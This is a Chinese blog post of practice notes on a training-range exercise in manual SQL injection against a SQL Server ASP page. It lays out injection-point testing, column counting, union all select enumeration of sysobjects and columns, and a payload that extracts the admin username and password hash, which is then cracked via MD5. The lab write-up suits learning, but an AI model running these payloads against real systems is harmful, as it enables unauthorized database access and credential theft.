刷题笔记:SQL手工注入漏洞测试(Sql Server数据库)

已于 2022-05-21 20:17:38 修改
阅读量914 收藏
点赞数
分类专栏: web安全刷题 文章标签: 学习
于 2022-03-26 10:19:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67399862/article/details/123750957
版权

 进入网页后,用and语句来判断是否有注入点,当输入and 1=2时,页面报错,而输入and 1=1时,页面恢复,说明可能存在注入点

用order by 语句来判断字段数,因为order by5时页面报错,而order by4时页面没有报错,则说明该字段数为4

用union select语句,但页面报错,网页不兼容,则上网查了查,需要用union all select

但页面仍然报错,考虑字符串的问题,后面的数字逐个加单引号试,直至页面不报错

然后将2的位置换为db_name可得到数据库名字

接着进行表的注入查询

用select top 1 name from mozhe_db_v2dbo.sysobjects where xtype='u'注入查询

其中xtype='U' 代表是用户建立的表。

接着进行列的查询

用 select top 1 col_name(object_id('manage'),1) from sysobjects注入查询

不断递归查询,直至无新信息,则表明列的数量

通过/new_list.asp?id=2 and 1=2 union all select 1,(select username from manage),(select password from manage where username in ('admin_mz')),4来爆字段

用MD5进行在线解密

便可得到用户名和密码登录 

m0_67399862
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者靶场 入门:SQL手工注入漏洞测试Sql Server数据库
qq_43233085的博客
01-10 1082
入门:SQL手工注入漏洞测试Sql Server数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Sql Server,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Sql Server的数据结构;...
墨者靶场SQL手工注入漏洞测试(Sql Server数据库)
曹振国的博客
06-20 436
Mssql关于SqlServer进入环境:1.寻找注入点:2.查询字段数:3.查询输出点:4.查询库名:5.查询表:6.查询字段:7.查询数据:MD5解码,进入后台拿到key值: 关于SqlServer MSSQL显错注入和MYSQL不太一样: 联合查询,记住要写UNION ALL 然后猜输出点要使用NULL去填充 注释只有-- + 进入环境: 1.寻找注入点: ?id=1 //报错 ?id=2 //正常 2.查询字段数: 有4个字段 ?id=2 and 1=1 order by 4 //正常
SQL注入手工检测sql注入检测
04-21
sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测
SQL手工注入漏洞测试(Sql Server数据库)
chinacqzgp的博客
09-20 890
和mysql 注入有些不同,union select 无法使用,Sql Server数据库只能用 union all
SQL手工注入漏洞测试(Sql Server数据库)-墨者
weoptions的博客
12-06 1278
———靶场专栏———分享我的打靶过程
墨者学院04 SQL手工注入漏洞测试(Sql Server数据库)
weixin_42789937的博客
01-25 317
墨者学院04 SQL手工注入漏洞测试(Sql Server数据库),熟悉的配方,熟悉的味道~
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1254
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
SQL server 数据库笔记.zip
最新发布
04-17
SQL Server 作为一个关系型数据库管理系统,涉及到一些专业术语。以下是几个常见的 SQL Server 专业术语的解释: 数据库(Database): 在 SQL Server 中,数据库是一个包含相关数据和对象的容器。它是数据的集合,...
sqlserver 数据库学习笔记
09-11
SQL Server数据库学习中,了解并掌握其核心概念和语法是非常关键的。下面将详细解析标题和描述中涉及的一些重要知识点: 1. **Exists 和 In 的理解:** - `Exists` 子句用于测试子查询是否返回至少一行数据。...
SQL Server数据库笔记整理(一)
01-19
关系型数据库是基于E-R模型(即实体-模型),使用SQL语言进行操作。 数据库分类:文档型数据库、服务型数据库(使用居多) (移动端即手机都是使用sqlite文档型数据库) 三范式:列不可拆分、唯一标识、引用主键 ...
SQL_Server2008数据库笔记
07-23
资源名称:SQL_Server2008数据库笔记资源截图: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 6893
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
SQL注入手工检测
热门推荐
zzkkoo8的博客
12-15 1万+
1基本检测 2绕过技巧2017年12月14日 09:36:161、基本检测 数字型 $id=@$_GET['id']; //id未经过滤 $sql = "SELECT * FROM sqltest WHERE id='$id'";判断 asp?id=49' //报错 asp?id=49 and 1=1 asp?id=49 and 1=2判断什么型 ?id=1%2b1 //加法减法,可区分数字
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
weixin_42939822的博客
03-16 3569
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
墨者 - SQL手工注入漏洞测试(Db2数据库)
吃肉唐僧的博客
07-11 2743
进入环境,用order by测试,发现可以,并测试到字段为4 接下来用union select 1,2,3,4 发现失败 后来上网看了别人的思路是union select 1,2,3,4 from sysibm.systables就可以回显了 应该是不同的数据库语法问题 爆库 id=2 union select 1,2,current schema,4 from sysibm...
sql手工注入实战
mulincong的博客
05-30 2255
sql手工注入封神台靶场
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
笔记记录了作者在CTF(Capture The Flag)比赛中的刷题经验,特别关注于一道名为"whitegive_pwn"的挑战。该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值